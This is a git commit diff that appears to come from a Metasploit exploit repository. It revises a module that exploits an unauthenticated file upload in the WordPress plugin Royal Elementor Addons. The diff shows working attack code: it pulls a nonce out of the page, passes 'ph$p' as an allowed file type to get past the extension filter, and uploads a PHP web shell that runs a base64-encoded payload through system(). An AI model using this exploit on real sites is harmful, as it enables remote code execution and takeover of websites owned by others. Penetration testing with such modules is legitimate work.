Add suggested changes
This commit is contained in:
parent
31daaf58fe
commit
65ea1188e2
|
@ -59,3 +59,4 @@ bookingpress
|
||||||
paid-memberships-pro
|
paid-memberships-pro
|
||||||
woocommerce-payments
|
woocommerce-payments
|
||||||
file-manager-advanced-shortcode
|
file-manager-advanced-shortcode
|
||||||
|
royal-elementor-addons
|
||||||
|
|
|
@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Targets' => [['Automatic', {}]],
|
'Targets' => [['Automatic', {}]],
|
||||||
'DisclosureDate' => '2023-11-23',
|
'DisclosureDate' => '2023-11-23',
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'SSL' => true,
|
||||||
|
'RPORT' => 443
|
||||||
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Notes' => {
|
'Notes' => {
|
||||||
'Stability' => [CRASH_SAFE],
|
'Stability' => [CRASH_SAFE],
|
||||||
|
@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
|
|
||||||
OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
|
|
||||||
Opt::RPORT(443)
|
|
||||||
])
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
||||||
|
|
||||||
if check_code.code == 'appears'
|
if check_code.code != 'appears'
|
||||||
plugin_version = check_code.details[:version]
|
return CheckCode::Safe
|
||||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
|
||||||
return CheckCode::Appears
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return CheckCode::Safe
|
plugin_version = check_code.details[:version]
|
||||||
|
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||||
|
return CheckCode::Appears
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
data = {
|
data = {
|
||||||
'action' => 'wpr_addons_upload_file',
|
'action' => 'wpr_addons_upload_file',
|
||||||
'max_file_size' => 0,
|
'max_file_size' => rand(10001),
|
||||||
'allowed_file_types' => 'ph$p',
|
'allowed_file_types' => 'ph$p',
|
||||||
'triggering_event' => 'click',
|
'triggering_event' => 'click',
|
||||||
'wpr_addons_nonce' => nonce
|
'wpr_addons_nonce' => nonce
|
||||||
}
|
}
|
||||||
|
|
||||||
file_content = '<?php '
|
file_content = '<?php '
|
||||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
|
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
|
||||||
file_content << ' ?>'
|
file_content << '?>'
|
||||||
|
|
||||||
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
||||||
|
|
||||||
|
@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
||||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
||||||
|
|
||||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
|
match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
|
||||||
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
||||||
|
|
||||||
nonce = JSON.parse(match[1])['nonce']
|
nonce = JSON.parse(match[1])['nonce']
|
||||||
|
|
Loading…
Reference in New Issue